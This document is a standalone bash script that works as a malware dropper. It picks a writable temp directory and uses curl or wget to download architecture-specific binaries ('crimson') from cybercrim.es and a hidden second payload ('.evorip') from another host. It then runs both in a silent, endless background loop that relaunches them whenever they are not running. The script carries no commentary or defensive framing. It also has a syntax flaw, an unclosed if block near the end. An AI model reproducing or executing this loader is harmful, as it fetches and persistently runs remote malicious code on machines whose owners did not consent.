#!/bin/bash
(

if [ -w '/dev/shm' ]; then
  export dir='/dev/shm'
elif [ -w '/var/tmp' ]; then
  export dir='/var/tmp'
elif [ -w '/tmp' ]; then
  export dir='/tmp'
fi 

if [ "$(command -v curl)" ] > /dev/null; then
  export bin_command="curl -s -o ${dir}/crimson"
  export mo2_command="curl -s -o ${dir}/.evorip"
elif [ "$(command -v wget)" ] > /dev/null; then
  export bin_command="wget -q -O ${dir}/crimson"
  export mo2_command="wget -q -O ${dir}/.evorip"
else
  exit
fi  

while true; do
    if [ ! -f "${dir}/crimson" ]; then
        arch=$(uname -m)
        if [ "${arch}" = "x86_64" ]; then
            ${bin_command} https://cybercrim.es/crimson.x86
            chmod a+x ${dir}/crimson
        elif [ "${arch}" = 'aarch64' ] ||[ "${arch}" = 'armv8l' ] ; then
            ${bin_command} https://cybercrim.es/crimson.arm
            chmod a+x ${dir}/crimson
        fi
    elif [ ! -f "${dir}/.evorip" ]; then
      ${mo2_command} https://openstorage.org/l1
      chmod a+x ${dir}/.evorip
    fi

    if ! pgrep -f '.evorip'; then
        cd ${dir} && ./.evorip
    fi
    
    if ! pgrep -f 'crimson'; then
        cd ${dir} && ./crimson
    sleep 4
done &
) &>/dev/null &
